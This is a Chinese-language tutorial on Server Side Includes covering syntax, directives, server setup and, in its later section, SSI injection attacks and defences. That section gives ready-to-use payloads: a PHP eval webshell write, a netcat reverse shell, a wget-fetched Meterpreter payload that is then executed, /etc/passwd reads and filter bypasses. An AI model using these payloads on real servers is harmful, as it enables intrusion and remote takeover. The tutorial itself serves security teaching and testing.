SSI攻防技术深度解析

一、SSI基本概念

SSI(Server Side Includes)是一种服务器端技术，允许开发者在网页中插入指令动态生成内容，简化网页开发和维护工作。

核心特点

• 通过简单SSI命令实现网站内容更新
• 支持动态显示时间日期
• 可执行Shell和CGI脚本程序
• 文件扩展名通常为.shtml

二、SSI语法规范

基本格式：

<!--#command param="value"-->

关键注意事项：

• 必须以HTML注释符<!--开头
• 紧跟#符号和SSI命令
• 注释符与#之间不能有空格
• 大小写敏感
• value需写在引号中

三、SSI核心指令详解

1. config命令

功能：配置SSI参数和选项

语法：

<!--#config errordocument="404 /errors/notfound.html" -->
<!--#config timefmt="%Y-%m-%d %H:%M:%S" -->

2. include命令

功能：包含其他文件内容

语法：

<!--#include file="header.html" -->
<!--#include virtual="/includes/header.html" -->

3. echo命令

功能：显示变量值

语法：

<!--#set var="pageTitle" value="Welcome" -->
<!--#echo var="pageTitle" -->
<!--#echo var="SERVER_NAME" -->

4. fsize命令

功能：显示文件大小

语法：

<!--#fsize file="image.jpg" -->

5. flastmod命令

功能：显示文件最后修改时间

语法：

<!--#flastmod file="index.html" -->

6. exec命令

功能：执行服务器命令并输出结果

语法：

<!--#exec cmd="ls -l" -->

7. for命令

功能：循环执行代码块

语法：

<!--#for var="i" start="1" end="5" -->
<!--#echo var="i" -->
<!--#endfor -->

8. if命令

功能：条件判断

语法：

<!--#if expr="$isLoggedIn eq 'true'" -->
<p>Welcome, user!</p>
<!--#else -->
<p>Welcome, guest!</p>
<!--#endif -->

四、服务器配置指南

IIS配置SSI

1. 打开IIS管理器
2. 选择目标站点
3. 双击"处理程序映射"
4. 添加模块映射：
   • 请求路径：*.shtml
   • 模块：ServerSideIncludeModule
   • 可执行文件：%windir%\system32\inetsrv\ssinc.dll
   • 名称：任意(如"SSI")
5. 确保默认文档包含SSI文件(如default.shtml)

Nginx配置SSI

1. 检查模块是否启用：

   nginx -V
   

   (确认输出包含--with-http_ssi_module)

2. 配置文件示例：

   server {
       listen 80;
       server_name www.example.com;
       ssi on;
       ssi_silent_errors on;
       ssi_types text/html;
   
       location / {
           root html;
           index index.html index.htm;
       }
   }
   

Apache配置SSI

1. 确保加载mod_include模块：

   LoadModule include_module libexec/apache2/mod_include.so
   

2. 添加SSI支持：

   Options +Includes
   AddType text/html .shtml
   AddOutputFilter INCLUDES .shtml
   

五、SSI漏洞攻防

漏洞成因

• 用户输入未过滤直接拼接到SSI指令
• 攻击者可插入恶意SSI命令

利用条件

1. 服务器支持SSI
2. 用户输入返回在HTML页面中
3. 参数未过滤或过滤不严

常见利用场景

1. 访客IP显示
2. 当前时间显示
3. 定位信息显示
4. 文件属性字段显示

攻击手法

1. 命令执行

<!--#EXEC cmd="whoami" -->
<!--#EXEC cmd="ls -al" -->

2. 写入Webshell

<!--#EXEC cmd="echo '<?php eval(\$_POST[c]);?>' > a.php" -->

3. 反弹Shell

<!--#EXEC cmd="nc 192.168.1.100 9999 -e /bin/bash" -->

4. 使用MSF反弹

1. 生成payload：

   msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.100 lport=4444 -f raw > shell.py
   

2. 构造SSI注入：

   <!--#EXEC cmd="wget http://192.168.1.100:1234/shell.py" -->
   <!--#EXEC cmd="chmod 777 shell.py" -->
   <!--#EXEC cmd="python shell.py" -->
   

5. 文件上传绕过

当PHP文件上传被限制时，可上传.shtml文件：

<!--#exec cmd="ls -al" -->

绕过技巧

1. 大小写绕过：

   <!--#EXEC cmd="cat /etc/passwd" -->  (当小写被过滤时)
   

六、防御措施

1. 如不使用SSI服务，关闭服务器SSI功能
2. 严格过滤SSI特殊字符(<, #, ", >, \, $等)
3. 限制可执行的SSI指令
4. 对用户输入进行严格验证和过滤
5. 最小化服务器权限

七、检测方法

1. 查找.shtml、.stm、.shtm文件
2. 测试输入点是否解析SSI指令
3. 检查服务器响应头中的SSI相关信息

八、实战案例

1. 发现index.shtml文件表明支持SSI
2. 测试输入框：

   <!--#EXEC cmd="whoami" -->
   

3. 确认漏洞后，逐步执行更复杂的攻击

九、总结

SSI技术虽然强大但存在安全风险，开发者和管理员应充分了解其工作机制和安全配置方法，在便利性和安全性之间取得平衡。攻击者则需掌握SSI漏洞的发现和利用技巧，用于渗透测试和安全评估。